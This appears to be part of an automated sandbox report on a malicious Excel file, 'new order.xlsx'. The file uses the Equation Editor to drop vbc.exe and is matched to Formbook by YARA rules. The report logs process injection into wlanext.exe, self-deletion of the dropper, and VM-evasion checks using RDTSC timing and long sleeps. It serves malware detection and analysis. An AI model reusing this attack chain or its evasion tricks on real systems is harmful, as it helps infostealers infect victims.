          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D83B0 NtAllocateVirtualMemory,9_2_000D83B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D81CB NtCreateFile,9_2_000D81CB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8222 NtReadFile,9_2_000D8222
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D827B NtReadFile,9_2_000D827B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D83AA NtAllocateVirtualMemory,9_2_000D83AA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D842A NtAllocateVirtualMemory,9_2_000D842A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CB217_2_0041CB21
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C707_2_00408C70
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092E0C67_2_0092E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095D0057_2_0095D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094905A7_2_0094905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009330407_2_00933040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092E2E97_2_0092E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D12387_2_009D1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D63BF7_2_009D63BF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009563DB7_2_009563DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092F3CF7_2_0092F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009323057_2_00932305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009373537_2_00937353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097A37B7_2_0097A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009654857_2_00965485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009414897_2_00941489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009B443E7_2_009B443E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096D47D7_2_0096D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094C5F07_2_0094C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093351F7_2_0093351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009765407_2_00976540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009346807_2_00934680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093E6C17_2_0093E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097A6347_2_0097A634
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D26227_2_009D2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009B579A7_2_009B579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093C7BC7_2_0093C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009657C37_2_009657C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009CF8EE7_2_009CF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093C85C7_2_0093C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095286D7_2_0095286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D098E7_2_009D098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009329B27_2_009329B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D12389_2_020D1238
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202E2E99_2_0202E2E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020323059_2_02032305
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020373539_2_02037353
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0207A37B9_2_0207A37B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D63BF9_2_020D63BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202F3CF9_2_0202F3CF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020563DB9_2_020563DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205D0059_2_0205D005
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020330409_2_02033040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204905A9_2_0204905A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202E0C69_2_0202E0C6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D26229_2_020D2622
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0207A6349_2_0207A634
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020346809_2_02034680
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203E6C19_2_0203E6C1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B579A9_2_020B579A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203C7BC9_2_0203C7BC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020657C39_2_020657C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B443E9_2_020B443E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0206D47D9_2_0206D47D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020654859_2_02065485
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020414899_2_02041489
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203351F9_2_0203351F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020765409_2_02076540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204C5F09_2_0204C5F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020E3A839_2_020E3A83
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02057B009_2_02057B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020DCBA49_2_020DCBA4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020BDBDA9_2_020BDBDA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202FBD79_2_0202FBD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203C85C9_2_0203C85C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205286D9_2_0205286D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CF8EE9_2_020CF8EE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B394B9_2_020B394B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B59559_2_020B5955
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D098E9_2_020D098E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020329B29_2_020329B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020469FE9_2_020469FE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02062E2F9_2_02062E2F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204EE4C9_2_0204EE4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02040F3F9_2_02040F3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205DF7C9_2_0205DF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CCFB19_2_020CCFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020A2FDC9_2_020A2FDC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02060D3B9_2_02060D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203CD5B9_2_0203CD5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CFDDD9_2_020CFDDD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DCB219_2_000DCB21
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C8C709_2_000C8C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C2D909_2_000C2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C2FB09_2_000C2FB0
          Source: new order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0202E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0209F970 appears 84 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0202DF5C appears 119 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02073F92 appears 132 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0207373B appears 244 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0099F970 appears 49 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00973F92 appears 76 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0097373B appears 150 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092DF5C appears 74 times
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: bin[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/13@4/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$new order.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF6CC.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: new order.xlsxVirustotal: Detection: 30%
          Source: new order.xlsxReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: new order.xlsxStatic file information: File size 1333760 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000002.2246150655.00000000002A9000.00000004.00000020.sdmp
          Source: new order.xlsxInitial sample: OLE indicators vbamacros = False
          Source: new order.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040D06C push ebp; iretd 7_2_0040D06D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C2C2 push FFFFFFF6h; ret 7_2_0041C2D5
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415324 push edi; retf 7_2_00415330
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3C5 push eax; ret 7_2_0041B418
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B47C push eax; ret 7_2_0041B482
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B412 push eax; ret 7_2_0041B418
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B41B push eax; ret 7_2_0041B482
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041576D push edx; retf 7_2_004157A0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415770 push edx; retf 7_2_004157A0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415F11 push cs; retf 7_2_00415FD3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415FD6 push cs; retf 7_2_00415FD3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C426E push esp; ret 7_2_008C426F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C1596 push ss; ret 7_2_008C1598
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00846D4B push ecx; retf 7_2_00846D4D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C5F8B push cs; ret 7_2_008C5FB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202DFA1 push ecx; ret 9_2_0202DFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000CD06C push ebp; iretd 9_2_000CD06D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DC2C2 push FFFFFFF6h; ret 9_2_000DC2D5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5324 push edi; retf 9_2_000D5330
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB3C5 push eax; ret 9_2_000DB418
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB41B push eax; ret 9_2_000DB482
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB412 push eax; ret 9_2_000DB418
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB47C push eax; ret 9_2_000DB482
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D576D push edx; retf 9_2_000D57A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5770 push edx; retf 9_2_000D57A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5F11 push cs; retf 9_2_000D5FD3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5FD6 push cs; retf 9_2_000D5FD3
          Source: initial sampleStatic PE information: section name: .text entropy: 7.75944853561
          Source: initial sampleStatic PE information: section name: .text entropy: 7.75944853561
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: new order.xlsxStream path 'EncryptedPackage' entropy: 7.99890686533 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000C85F4 second address: 00000000000C85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000C898E second address: 00000000000C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc 7_2_004088C0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2352Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2580Thread sleep time: -56221s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2524Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 56221Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000008.00000000.2217725190.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2231668260.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2217760556.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2217725190.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.2211654384.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
